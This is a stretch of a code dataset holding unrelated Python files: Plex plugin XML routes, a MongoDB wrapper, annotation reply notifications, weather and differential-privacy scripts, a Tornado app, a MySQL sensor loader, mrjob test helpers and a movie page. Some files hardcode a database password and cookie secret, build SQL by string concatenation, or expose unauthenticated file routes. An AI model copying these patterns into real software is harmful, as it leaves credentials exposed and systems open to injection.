'''\n@route(PREFIX + '/DelFromXML')\ndef DelFromXML(fileName, attribute, value):\n\tfrom xml.etree import ElementTree\n\tLog.Debug('Need to delete element with an attribute named \"%s\" with a value of \"%s\" from file named \"%s\"' %(attribute, value, fileName))\n\n\twith io.open(fileName, 'r') as f:\n\t\ttree = ElementTree.parse(f)\n\t\troot = tree.getroot()\n\t\tmySubtitles = root.findall('.//Subtitle')\n\t\tfor Subtitles in root.findall(\"Language[Subtitle]\"):\n\t\t\tfor node in Subtitles.findall(\"Subtitle\"):\n\t\t\t\tmyValue = node.attrib.get(attribute)\n\t\t\t\tif myValue:\n\t\t\t\t\tif '_' in myValue:\n\t\t\t\t\t\tdrop, myValue = myValue.split(\"_\")\n\t\t\t\t\tif myValue == value:\n\t\t\t\t\t\tSubtitles.remove(node)\n\ttree.write(fileName, encoding='utf-8', xml_declaration=True)\n\treturn\n\n####################################################################################################\n# Returns the contents of an XML file\n####################################################################################################\n''' Returns the contents of an XML file '''\n@route(PREFIX + '/GetXMLFile')\ndef GetXMLFile(Secret, Path):\n\tif PwdOK(Secret):\n\t\tLog.Debug('Getting contents of an XML file named %s' %(Path))\t\t\n\t\tdocument = et.parse( Path )\n\t\troot = document.getroot()\n\t\treturn et.tostring(root, encoding='utf8', method='xml')\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Returns the contents of an XML file from an url\n####################################################################################################\n''' Returns the contents of an XML file '''\n@route(PREFIX + '/GetXMLFileFromUrl')\ndef GetXMLFileFromUrl(Secret, Url):\n\tif PwdOK(Secret):\n\t\timport urllib2\n\t\tLog.Debug('Getting contents of an XML file from Url: %s' %(Url))\n\t\tdocument = et.parse(urllib2.urlopen(Url))\t\t\n\t\troot = document.getroot()\n\t\treturn et.tostring(root, encoding='utf8', method='xml')\n\telse:\n\t\treturn ERRORAUTH\n\n####################################################################################################\n# Force a restart 
run\n####################################################################################################\n''' When called, this channel is restarted '''\n@route(PREFIX + '/Restart')\ndef Restart():\n\tLog.Debug('Restarting')\n\tStart()\n\n\n","sub_path":"Contents/Code/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"651983150","text":"import asyncio_mongo\n\n\nasync def create_db():\n db = Db()\n await db._init()\n return db\n\n\nclass Db:\n\n INSTANCE = None\n DATABASE = 'Clang'\n\n def __init__(self):\n if self.INSTANCE is not None:\n raise ValueError(\"An instantiation already exists!\")\n # self.settings = settings\n\n async def _init(self):\n mongo = await asyncio_mongo.Connection.create('localhost', 27017)\n self.clang_db = mongo[self.DATABASE]\n\n @classmethod\n def get_instance(cls):\n if cls.INSTANCE is None:\n cls.INSTANCE = Db()\n return cls.INSTANCE\n\n async def insert(self, table_name, items):\n table = self.clang_db[table_name]\n try:\n result = await table.insert(items, safe=True)\n except Exception:\n raise ValueError\n return result\n\n async def find_all(self, table_name, limit=None):\n table = self.clang_db[table_name]\n if limit is None:\n limit = 0\n result = await table.find(limit=limit)\n return result\n\n async def find_one(self, table_name, query):\n table = self.clang_db[table_name]\n result = await table.find_one(fields=query)\n return result\n\n async def find(self, table_name, query, limit=None):\n table = self.clang_db[table_name]\n if limit is None:\n limit = 1\n result = await table.find(fields=query, limit=limit)\n return result\n\n async def delete(self, table_name, query):\n table = self.clang_db[table_name]\n result = await table.remove(query, safe=True)\n return result\n\n async def update(self, table_name, key, update):\n table = self.clang_db[table_name]\n result = await table.update(key, {\"$set\": update}, safe=True)\n return result\n","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"392303114","text":"# -*- coding: utf-8 -*-\nimport logging\nimport re\nfrom datetime import datetime\n\nfrom pyramid.events import subscriber\nfrom pyramid.renderers import render\n\nfrom h import auth\nfrom h.auth.util import translate_annotation_principals\nfrom h.api import storage\nfrom h.notification.notifier import TemplateRenderException\nfrom h.notification import types\nfrom h.notification.models import Subscriptions\nfrom h.notification.gateway import user_name, \\\n user_profile_url, standalone_url, get_user_by_name\nfrom h.notification.types import ROOT_PATH, REPLY_TYPE\nfrom h.accounts.events import LoginEvent, RegistrationEvent\n\nlog = logging.getLogger(__name__)\n\nTXT_TEMPLATE = ROOT_PATH + 'reply_notification.txt.jinja2'\nHTML_TEMPLATE = ROOT_PATH + 'reply_notification.html.jinja2'\nSUBJECT_TEMPLATE = ROOT_PATH + 'reply_notification_subject.txt.jinja2'\n\n\ndef create_template_map(request, reply, parent):\n document_title = ''\n if 'document' in reply:\n document_title = reply['document'].get('title', '')\n\n if document_title is '':\n document_title = parent['uri']\n\n parent_user = user_name(parent['user'])\n reply_user = user_name(reply['user'])\n\n token = request.registry.notification_serializer.dumps({\n 'type': REPLY_TYPE,\n 'uri': parent['user'],\n })\n unsubscribe = 
request.route_url('unsubscribe', token=token)\n\n return {\n 'document_title': document_title,\n 'document_path': parent['uri'],\n 'parent_text': parent.get('text', ''),\n 'parent_user': parent_user,\n 'parent_timestamp': format_timestamp(parent['created']),\n 'parent_user_profile': user_profile_url(request, parent['user']),\n 'parent_path': standalone_url(request, parent['id']),\n 'reply_text': reply['text'],\n 'reply_user': reply_user,\n 'reply_timestamp': format_timestamp(reply['created']),\n 'reply_user_profile': user_profile_url(request, reply['user']),\n 'reply_path': standalone_url(request, reply['id']),\n 'unsubscribe': unsubscribe\n }\n\n\ndef format_timestamp(timestamp):\n # Currently we cut the UTC format because time.strptime has problems\n # parsing it, and of course it'd only correct the backend's timezone\n # which is not meaningful for international users. This trims the\n # timezone in the format +00:00.\n timestamp = re.sub(r'\\+\\d\\d:\\d\\d$', '', timestamp)\n timestamp_format = '%Y-%m-%dT%H:%M:%S.%f'\n parsed = datetime.strptime(timestamp, timestamp_format)\n\n template_format = '%d %B at %H:%M'\n if parsed.year < datetime.now().year:\n template_format = '%d %B %Y at %H:%M'\n return parsed.strftime(template_format)\n\n\ndef get_recipients(request, parent):\n username = user_name(parent['user'])\n user_obj = get_user_by_name(request, username)\n if not user_obj:\n raise TemplateRenderException('User not found')\n return [user_obj.email]\n\n\ndef check_conditions(annotation, data):\n # Do not notify users about their own replies\n if annotation['user'] == data['parent']['user']:\n return False\n\n # Is he the proper user?\n if data['parent']['user'] != data['subscription']['uri']:\n return False\n\n # Else okay\n return True\n\n\ndef generate_notifications(request, annotation, action):\n # Only send notifications when new annotations are created\n if action != 'create':\n return\n\n # If the annotation doesn't have a parent, we can't find its parent, or we\n # have no idea who the author of the parent is, then we can't send a\n # notification email.\n parent_id = annotation.parent_id\n if parent_id is None:\n return\n parent = storage.fetch_annotation(request, parent_id)\n if parent is None or 'user' not in parent:\n return\n\n # We don't send replies to the author of the parent unless they're going to\n # be able to read it. 
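    # For example (principal strings here are only illustrative): a reply
    # readable by ['group:__world__'] gets mailed when the parent author's
    # effective principals also include 'group:__world__'; disjoint sets
    # mean we return without queueing a notification.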
That means there must be some overlap between the set\n # of effective principals of the parent's author, and the read permissions\n # of the reply.\n child_read_permissions = annotation.get('permissions', {}).get('read', [])\n parent_principals = auth.effective_principals(parent['user'], request)\n read_principals = translate_annotation_principals(child_read_permissions)\n if not set(parent_principals).intersection(read_principals):\n return\n\n # Store the parent values as additional data\n data = {\n 'parent': parent\n }\n\n subscriptions = Subscriptions.get_active_subscriptions_for_a_type(\n types.REPLY_TYPE)\n for subscription in subscriptions:\n data['subscription'] = subscription.__json__(request)\n\n # Validate annotation\n if check_conditions(annotation, data):\n try:\n subject, text, html, recipients = render_reply_notification(\n request,\n annotation,\n parent)\n yield subject, text, html, recipients\n # ToDo: proper exception handling here\n except TemplateRenderException:\n log.exception('Failed to render subscription'\n ' template %s', subscription)\n except:\n log.exception('Unknown error when trying to render'\n ' subscription template %s', subscription)\n\n\ndef render_reply_notification(request, annotation, parent):\n # Render e-mail parts\n tmap = create_template_map(request, annotation, parent)\n text = render(TXT_TEMPLATE, tmap, request).strip()\n html = render(HTML_TEMPLATE, tmap, request).strip()\n subject = render(SUBJECT_TEMPLATE, tmap, request).strip()\n recipients = get_recipients(request, parent)\n return subject, text, html, recipients\n\n\n# Create a reply template for a uri\ndef create_subscription(request, uri, active):\n subs = Subscriptions(\n uri=uri,\n type=types.REPLY_TYPE,\n active=active\n )\n\n request.db.add(subs)\n request.db.flush()\n\n\n@subscriber(RegistrationEvent)\ndef registration_subscriptions(event):\n request = event.request\n user_uri = u'acct:{}@{}'.format(event.user.username, request.domain)\n create_subscription(event.request, user_uri, True)\n\n\n# For backwards compatibility, generate reply notification if not exists\n@subscriber(LoginEvent)\ndef check_reply_subscriptions(event):\n request = event.request\n user_uri = 'acct:{}@{}'.format(event.user.username, request.domain)\n res = Subscriptions.get_templates_for_uri_and_type(user_uri,\n types.REPLY_TYPE)\n if not len(res):\n create_subscription(event.request, user_uri, True)\n\n\ndef includeme(config):\n config.scan(__name__)\n","sub_path":"h/notification/reply_template.py","file_name":"reply_template.py","file_ext":"py","file_size_in_byte":6692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"312022080","text":"#!/usr/bin/env python\n# Pull out yearly precipitation\n# Daryl Herzmann 26 Jul 2004\n\nimport shutil\n\nimport dbflib\nimport mx.DateTime\nimport pg\n\nmydb = pg.connect(\"wepp\", \"iemdb\")\n\nsts = mx.DateTime.DateTime(2008, 3, 1)\nets = mx.DateTime.DateTime(2008, 11, 1)\ninterval = mx.DateTime.RelativeDateTime(days=+7)\n\nnow = sts\nohrap = {}\nrs = mydb.query(\"SELECT hrap_i from hrap_utm ORDER by hrap_i ASC\").dictresult()\nfor i in range(len(rs)):\n ohrap[int(rs[i][\"hrap_i\"])] = {\"rain\": 0, \"hours\": 0, \"mrain\": 0}\n\nhrapi = ohrap.keys()\nhrapi.sort()\n\nwhile now < ets:\n dbf = dbflib.create(\"weeklyrain/%srain\" % (now.strftime(\"%Y%m%d\"),))\n dbf.add_field(\"RAINFALL\", dbflib.FTDouble, 8, 2)\n dbf.add_field(\"RAINHOUR\", dbflib.FTDouble, 8, 2)\n dbf.add_field(\"RAINPEAK\", dbflib.FTDouble, 8, 2)\n\n 
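    # One week of rainfall per HRAP cell; /25.4 appears to convert mm to
    # inches, and the *4 and /4.0 factors presumably rescale 15-minute
    # buckets into an hourly peak rate and a count of hours.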
rs = mydb.query(\n \"select hrap_i, sum(rainfall) /25.4 as rain, \\\n\tmax(peak_15min) /25.4 * 4 as mrain, sum(hr_cnt) / 4.0 as hours from \\\n\tdaily_rainfall_%s WHERE valid >= '%s' and valid < '%s' \\\n GROUP by hrap_i ORDER by hrap_i ASC\"\n % (\n now.strftime(\"%Y\"),\n now.strftime(\"%Y-%m-%d\"),\n (now + interval).strftime(\"%Y-%m-%d\"),\n )\n ).dictresult()\n\n hrap = ohrap\n for i in range(len(rs)):\n # print rs[i]\n hrap[int(rs[i][\"hrap_i\"])] = {\n \"rain\": float(rs[i][\"rain\"]),\n \"hours\": float(rs[i][\"hours\"]),\n \"mrain\": float(rs[i][\"mrain\"]),\n }\n\n for i in range(len(hrapi)):\n key = hrapi[i]\n dbf.write_record(\n i, (hrap[key][\"rain\"], hrap[key][\"hours\"], hrap[key][\"mrain\"])\n )\n\n del dbf\n shutil.copy(\n \"static/hrap_point_4326.shp\",\n \"weeklyrain/%srain.shp\" % (now.strftime(\"%Y%m%d\"),),\n )\n shutil.copy(\n \"static/hrap_point_4326.shx\",\n \"weeklyrain/%srain.shx\" % (now.strftime(\"%Y%m%d\"),),\n )\n shutil.copy(\n \"static/hrap_point_4326.prj\",\n \"weeklyrain/%srain.prj\" % (now.strftime(\"%Y%m%d\"),),\n )\n\n now += interval\n","sub_path":"scripts/GIS/weeklyPrecip.py","file_name":"weeklyPrecip.py","file_ext":"py","file_size_in_byte":2018,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"475834676","text":"\"\"\"Simulation of the impact of differential privacy on a block that has\nN people all the same age (22).\"\"\"\n\nBLOCK_AGE=22\nMAX_AGE=110\nNUM_TRIALS=10000\nTRIALS='trials'\nPRIVATIZED_AVERAGE_AGE='privatized_average_age'\nPRIVATIZED_AVERAGE_AGES='privatized_average_ages'\nPRIVATIZED_COUNT='privatized_count'\nPRIVATIZED_COUNTS='privatized_counts'\nPRIVATIZED_MEDIAN_AGE='privatized_median_age'\nPRIVATIZED_MEDIAN_AGES='privatized_median_ages'\n\nEPSILON='ε'\nNPEOPLE='npeople'\nPERCENTILES=[5, 25, 50, 75, 95]\nimport numpy as np\nimport matplotlib.pyplot as plot\n\ndef privitize_block(epsilon, npeople):\n \"\"\"Given a block of npeople all the same age, return the private value of\n (averageAge, count)\n \"\"\"\n hist = np.resize(0,MAX_AGE)\n hist[BLOCK_AGE] = npeople\n private_hist = hist + np.random.laplace(loc=0,\n scale=np.resize(1/epsilon,MAX_AGE))\n private_count = private_hist.sum()\n private_average_age = (private_hist * np.arange(MAX_AGE)).sum() / private_count\n\n # Compute the median age by performing a linear interpolation\n # to 0.5 over the cumulative probability function\n # c.f. 
https://stackoverflow.com/questions/43992223/compute-median-for-numpy-histogram2d-data\n normalized_private_histogram = private_hist / private_hist.sum()\n private_median_age = np.interp(.5, np.cumsum(normalized_private_histogram), np.arange(MAX_AGE))\n\n return {PRIVATIZED_COUNT:private_count,\n PRIVATIZED_AVERAGE_AGE:private_average_age,\n PRIVATIZED_MEDIAN_AGE:private_median_age}\n\ndef run_experiment(epsilon, npeople, num_trials=NUM_TRIALS):\n \"\"\"Repeatedly run the experiment and report back the average ages and average counts.\"\"\"\n runs = [privitize_block(epsilon, npeople) for i in range(num_trials)]\n private_counts = np.array([o[PRIVATIZED_COUNT] for o in runs])\n private_average_ages = np.array([o[PRIVATIZED_AVERAGE_AGE] for o in runs])\n private_median_ages = np.array([o[PRIVATIZED_MEDIAN_AGE] for o in runs])\n return {EPSILON:epsilon,\n NPEOPLE:npeople,\n TRIALS:NUM_TRIALS,\n PRIVATIZED_COUNTS:private_counts,\n PRIVATIZED_AVERAGE_AGES:private_average_ages,\n PRIVATIZED_MEDIAN_AGES:private_median_ages }\n\nif __name__==\"__main__\":\n data = []\n labels = []\n for epsilon in [1]:\n for num_people in [1,10,100]:\n expdata = run_experiment(epsilon, npeople=num_people, num_trials=NUM_TRIALS)\n print(f\"epsilon: {epsilon} num_people: {num_people}\")\n\n count_per = np.percentile(expdata[PRIVATIZED_COUNTS],[25,75,2.5,97.5])\n print(f\"count 25%-75% percentiles: \", count_per[0],count_per[1])\n print(f\"count 95% percentiles: \", count_per[2],count_per[3])\n\n median_per = np.percentile(expdata[PRIVATIZED_MEDIAN_AGES],[25,75,2.5,97.5])\n print(f\"median 25%-75% percentiles: \", median_per[0],median_per[1])\n print(f\"median 95% percentiles: \", median_per[2],median_per[3])\n\n average_per = np.percentile(expdata[PRIVATIZED_AVERAGE_AGES],[25,75,2.5,97.5])\n print(f\"average 25%-75% percentiles: \", average_per[0],average_per[1])\n print(f\"average 95% percentiles: \", average_per[2],average_per[3])\n\n\n print(\"\")\n\n\n\"\"\"\n labels.append(str(epsilon))\n expdata = run_experiment(epsilon, npeople=1, num_trials=NUM_TRIALS)\n data.append( expdata[PRIVATIZED_COUNTS])\n \n fig, ax = plot.subplots()\n fig.set_size_inches(8,6)\n #ax.set_title(f\\\"average age distribution vs. epsilon for {NUM_TRIALS} trials, n=1\\\")\n ax.set_title(f\\\"average count vs. 
epsilon for {len(data[0])} trials, n=1\\\")\n ax.boxplot(labels=labels, x=data);\n ax.set_ylim(-20,20)\n ax.set_ylabel(\\\"average count\\\")\n ax.set_xlabel(EPSILON)\n plot.show()\"\n\"\"\"\n \n\n\n\n\n","sub_path":"demo3/demo4.py","file_name":"demo4.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"650974362","text":"import cv2\nimport time\n\ncapture = cv2.VideoCapture(0)\nfor i in range(100):\n\tst=time.time()\n\tret,frame=capture.read()\n\tend=time.time()\n\tprint(end-st)\n\tcv2.imshow(\"frame\",frame)\n\tcv2.waitKey(1000)","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"462750487","text":"# encoding: utf-8\n# Copyright (c) 2008-2014, IPython Development Team and Enthought, Inc.\n\"\"\"\nCreate a distarray, then plot its array distribution.\n\"\"\"\n\n__docformat__ = \"restructuredtext en\"\n\nimport distarray\n\n\nc = distarray.Context()\na = c.zeros((10, 10, 10), dtype='int32', dist=('b', 'n', 'c'))\n","sub_path":"examples/make_distarray.py","file_name":"make_distarray.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"527503044","text":"#!/usr/bin/env python\n# -*-coding: utf-8 -*-\n__author__ = 'livvy'\n\nimport tornado.web\nimport tornado.options\nimport tornado.httpserver\nimport tornado.ioloop\nimport torndb\nimport os.path\nimport controller.home\nimport controller.account\nimport controller.question\nimport logging\nimport config\nimport controller.test\nimport loggingConfig\n\n__all__ = ['Application']\n\ntornado.options.define(\"port\", default=8888, help=\"run the given port\",\n type=int)\n\n\nclass Application(tornado.web.Application):\n def __init__(self):\n self.announce = controller.test.Announce()\n handlers = [\n (r\"/\", controller.home.HomeHandler),\n (r\"/account/login\", controller.account.LoginHandler),\n (r\"/account/logout\", controller.account.LogoutHandler),\n (r\"/account/register\", controller.account.RegisterHandler),\n (r\"/question/ask\", controller.question.AskHandler),\n (r\"/question/show/([\\d]+)\", controller.question.ShowHandler),\n (r\"/home/myPage\",controller.home.myPageHandler),\n\n (r\"/home/test\",controller.test.MainHandler),\n (r\"/home/test/chat\",controller.test.ChatHandler),\n (r\"/home/test/status\",controller.test.StatusHandler)\n ]\n settings = dict(\n site_title=u\"PengCaCa\",\n template_path=os.path.join(os.path.dirname(__file__), \"templates\"),\n static_path=os.path.join(os.path.dirname(__file__), \"static\"),\n xsrf_cookie=True,\n cookie_secret=\"傻羊ASFfgshhajHJkwiqksmsKKd_asjjksaLsesdl\",\n login_url=\"/account/login\",\n debug=True,\n )\n tornado.web.Application.__init__(self, handlers, **settings)\n self.db = torndb.Connection(\n host=config.SiteConfig.get('database',\n 'host') + ':' + config.SiteConfig.get(\n 'database', 'port'),\n database=config.SiteConfig.get('database', 'db'),\n user=config.SiteConfig.get('database', 'user'),\n password=config.SiteConfig.get('database', 'password'))\n\n\ndef main():\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(Application())\n http_server.listen(tornado.options.options.port)\n tornado.ioloop.IOLoop.instance().start()\n\n\nif __name__ == \"__main__\":\n logging.getLogger(\"site\").info(\"start\")\n 
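# NOTE (added comment): the \"port\" option defined at the top of this file\n    # can be overridden at launch, e.g. \"python main.py --port=8000\";\n    # tornado.options.parse_command_line() consumes such --name=value flags\n    # before the HTTP server starts listening.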
main()\n\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"308889253","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport schedule\nimport time\nfrom vkmessage import vkpost\n\n\ndef job():\n fly = vkpost()\n print(fly)\n return\n\n\nschedule.every().day.at(\"08:30\").do(job)\n\nwhile True:\n schedule.run_pending()\n time.sleep(1)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"619941091","text":"# -*- coding: utf-8 -*-\n\nimport MySQLdb as mdb\n\nconn = mdb.connect(host= \"localhost\",\n\t\t\t\t user=\"root\",\n\t\t\t\t passwd=\"ibo43har\",\n\t\t\t\t db=\"garten\")\nx = conn.cursor()\n\nlinecount = 0\nfile = open(\"/tmp/plants.txt\", \"r\")\nfor line in file:\n if line=='':\n break\n linecount = linecount + 1\n if linecount == 1:\n plant_name = line.strip('\\n')\n if linecount == 2:\n plant_batt = line.strip('\\n')\n if linecount == 3:\n plant_water = line.strip('\\n')\n if linecount == 4:\n plant_temp = line.strip('\\n')\n if linecount == 5:\n plant_light = line.strip('\\n')\n\n sql = \"INSERT INTO plants (sensor_name,battery,water,temp,light) VALUES('\" + plant_name + \"',\" + plant_batt + \",\" + plant_water + \",'\" + plant_temp + \"',\" + plant_light + \");\"\n x.execute(sql)\n \n linecount = 0\n #print sql\nx.close\nconn.commit()\n","sub_path":"poolmodules/miflora/write_plantsdb.py","file_name":"write_plantsdb.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"6435716","text":"# Copyright 2009-2012 Yelp and Contributors\n# Copyright 2013 David Marin\n# Copyright 2015-2016 Yelp\n# Copyright 2017 Yelp\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\nimport os\nimport os.path\nimport random\nimport stat\nfrom contextlib import contextmanager\nfrom tempfile import mkdtemp\nfrom shutil import rmtree\nfrom unittest import TestCase\n\nimport mrjob\nfrom mrjob import runner\n\nfrom tests.py2 import patch\nfrom tests.quiet import add_null_handler_to_root_logger\n\n\n# simple config that also silences 'no config options for runner' logging\nEMPTY_MRJOB_CONF = {'runners': {\n 'local': {\n 'label': 'test_job',\n },\n 'emr': {\n 'check_cluster_every': 0.00,\n 'cloud_fs_sync_secs': 0.00,\n },\n 'hadoop': {\n 'label': 'test_job',\n },\n 'inline': {\n 'label': 'test_job',\n },\n 'dataproc': {\n 'api_cooldown_secs': 0.00,\n 'cloud_fs_sync_secs': 0.00\n }\n}}\n\n\ndef mrjob_conf_patcher(substitute_conf=EMPTY_MRJOB_CONF):\n def mock_load_opts_from_mrjob_confs(runner_alias, conf_paths=None):\n return [(None, substitute_conf['runners'][runner_alias])]\n\n return patch.object(runner, 'load_opts_from_mrjob_confs',\n mock_load_opts_from_mrjob_confs)\n\n\n@contextmanager\ndef random_seed(seed):\n \"\"\"Temporarily change 
the seed of the random number generator.\"\"\"\n    state = random.getstate()\n\n    random.seed(seed)\n\n    try:\n        yield\n    finally:\n        random.setstate(state)\n\n\nclass PatcherTestCase(TestCase):\n\n    def start(self, patcher):\n        \"\"\"Add the given patcher to this test case's cleanup actions,\n        then start it, and return the mock it returns. Example:\n\n            mock_turtle = self.start(patch('foo.bar.turtle'))\n        \"\"\"\n        mock = patcher.start()\n        # don't addCleanup() if patcher fails\n        self.addCleanup(patcher.stop)\n        return mock\n\n\nclass EmptyMrjobConfTestCase(PatcherTestCase):\n\n    # set to None if you don't want load_opts_from_mrjob_confs patched\n    MRJOB_CONF_CONTENTS = EMPTY_MRJOB_CONF\n\n    def setUp(self):\n        super(EmptyMrjobConfTestCase, self).setUp()\n\n        add_null_handler_to_root_logger()\n\n        if self.MRJOB_CONF_CONTENTS is not None:\n            patcher = mrjob_conf_patcher(self.MRJOB_CONF_CONTENTS)\n            patcher.start()\n            self.addCleanup(patcher.stop)\n\n\nclass SandboxedTestCase(EmptyMrjobConfTestCase):\n    \"\"\"Patch mrjob.conf, create a temp directory, and save the environment for\n    each test\n    \"\"\"\n    def setUp(self):\n        super(SandboxedTestCase, self).setUp()\n\n        # tmp dir\n        self.tmp_dir = mkdtemp()\n        self.addCleanup(rmtree, self.tmp_dir)\n\n        # environment\n        old_environ = os.environ.copy()\n        # cleanup functions are called in reverse order\n        self.addCleanup(os.environ.update, old_environ)\n        self.addCleanup(os.environ.clear)\n\n    def makedirs(self, path):\n        abs_path = os.path.join(self.tmp_dir, path)\n        if not os.path.isdir(abs_path):\n            os.makedirs(abs_path)\n        return abs_path\n\n    def makefile(self, path, contents=b'', executable=False):\n        self.makedirs(os.path.dirname(path))\n        abs_path = os.path.join(self.tmp_dir, path)\n\n        mode = 'wb' if isinstance(contents, bytes) else 'w'\n        with open(abs_path, mode) as f:\n            f.write(contents)\n        if executable:\n            os.chmod(abs_path,\n                     os.stat(abs_path).st_mode | stat.S_IXUSR)\n\n        return abs_path\n\n    def abs_paths(self, *paths):\n        return [os.path.join(self.tmp_dir, path) for path in paths]\n\n    def add_mrjob_to_pythonpath(self):\n        \"\"\"call this for tests that are going to invoke a subprocess\n        that needs to find mrjob.\n\n        (Merely using the local runner won't require this, because it\n        bootstraps mrjob by default.)\n        \"\"\"\n        os.environ['PYTHONPATH'] = (\n            mrjob_pythonpath() + ':' + os.environ.get('PYTHONPATH', ''))\n\n\ndef mrjob_pythonpath():\n    \"\"\"The directory containing the mrjob package that we've imported.\"\"\"\n    return os.path.abspath(\n        os.path.join(os.path.dirname(mrjob.__file__), '..'))\n","sub_path":"tests/sandbox.py","file_name":"sandbox.py","file_ext":"py","file_size_in_byte":4654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
{"seq_id":"239019713","text":"import media\r\nimport fresh_tomatoes\r\n\r\n# Joseph Langdale FSND 8-20-2017\r\n# this code is used in conjunction with media.py and fresh_tomatoes.py\r\n# to build an HTML page\r\n# media.py contains class Movie\r\n# fresh_tomatoes.py builds the html page\r\n# highlighting my favorite movies of 2017\r\n# Version 2\r\n\r\n\r\n# Build Movie Objects\r\n\r\ndunkirk = media.Movie(\"Dunkirk\",\r\n                      \"The struggle of the British Army to return home from\"\r\n                      \" France early in World War 2.\",\r\n                      \"Christopher Nolan\",\r\n                      \"2017\",\r\n                      \"https://upload.wikimedia.org/wikipedia/en/1/15/Dunkirk_Film_poster.jpg\", # NOQA\r\n                      \"https://www.youtube.com/watch?v=F-eMt3SrfFU\")\r\n\r\nbaby_driver = media.Movie(\"Baby Driver\",\r\n                          \"A young get-away driver gets in over his head.\",\r\n                          \"Edgar Wright\",\r\n                          \"2017\",\r\n                          \"https://upload.wikimedia.org/wikipedia/en/8/8e/Baby_Driver_poster.jpg\", # NOQA\r\n                          \"https://www.youtube.com/watch?v=z2z857RSfhk\")\r\n\r\nspider_man_homecoming = media.Movie(\"Spider-Man: Homecoming\",\r\n                                    \"Peter Parker returns to New York after \"\r\n                                    \"his Avenger outing.\",\r\n                                    \"Jon Watts\",\r\n                                    \"2017\",\r\n                                    \"https://upload.wikimedia.org/wikipedia/en/f/f9/Spider-Man_Homecoming_poster.jpg\", # NOQA\r\n                                    \"https://www.youtube.com/watch?v=8wNgphPi5VM\") # NOQA\r\n\r\nguardians = media.Movie(\"Guardians of the Galaxy Vol. 2\",\r\n                        \"The Galaxy needs saving again.\",\r\n                        \"James Gunn\",\r\n                        \"2017\",\r\n                        \"https://upload.wikimedia.org/wikipedia/en/9/95/GotG_Vol2_poster.jpg\", # NOQA\r\n                        \"https://www.youtube.com/watch?v=duGqrYw4usE\")\r\n\r\nwonder_woman = media.Movie(\"Wonder Woman\",\r\n                           \"In a time of war a hero leaves her home to save \"\r\n                           \"the world.\",\r\n                           \"Patty Jenkins\",\r\n                           \"2017\",\r\n                           \"https://upload.wikimedia.org/wikipedia/en/e/ed/Wonder_Woman_%282017_film%29.jpg\", # NOQA\r\n                           \"https://www.youtube.com/watch?v=VSB4wGIdDwo\")\r\n\r\ncolossal = media.Movie(\"Colossal\",\r\n                       \"An unemployed writer returns to her hometown to sort \"\r\n                       \"things out.\",\r\n                       \"Nacho Vigalondo\",\r\n                       \"2017\",\r\n                       \"https://upload.wikimedia.org/wikipedia/en/3/33/Colossal_%28film%29.png\", # NOQA\r\n                       \"https://www.youtube.com/watch?v=Q8hpm_BcHKE\")\r\n\r\nkong = media.Movie(\"Kong: Skull Island\",\r\n                   \"Researchers are escorted to a secluded island in the \"\r\n                   \"Pacific.\",\r\n                   \"Jordan Vogt-Roberts\",\r\n                   \"2017\",\r\n                   \"https://upload.wikimedia.org/wikipedia/en/3/34/Kong_Skull_Island_poster.jpg\", # NOQA\r\n                   \"https://www.youtube.com/watch?v=44LdLqgOpjo\")\r\n\r\nwick = media.Movie(\"John Wick: Chapter 2\",\r\n                   \"An assassin becomes the hunted.\",\r\n                   \"Chad Stahelski\",\r\n                   \"2017\",\r\n                   \"https://upload.wikimedia.org/wikipedia/en/3/31/John_Wick_Chapter_Two.png\", # NOQA\r\n                   \"https://www.youtube.com/watch?v=ChpLV9AMqm4\")\r\n\r\nlogan = media.Movie(\"Logan\",\r\n                    \"The Wolverine's journey continues.\",\r\n                    \"James Mangold\",\r\n                    \"2017\",\r\n                    \"https://upload.wikimedia.org/wikipedia/en/3/37/Logan_2017_poster.jpg\", # NOQA\r\n                    \"https://www.youtube.com/watch?v=RH3OxVFvTeg\")\r\n\r\n# Assemble list of movie objects\r\nmovies = [\r\n    baby_driver, wonder_woman,\r\n    logan, wick,\r\n    dunkirk, colossal,\r\n    kong, spider_man_homecoming,\r\n    guardians]\r\n\r\n# call function from fresh_tomatoes to build web page\r\nfresh_tomatoes.open_movies_page(movies)\r\n","sub_path":"entertainment_center.py","file_name":"entertainment_center.py","file_ext":"py","file_size_in_byte":4272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"}
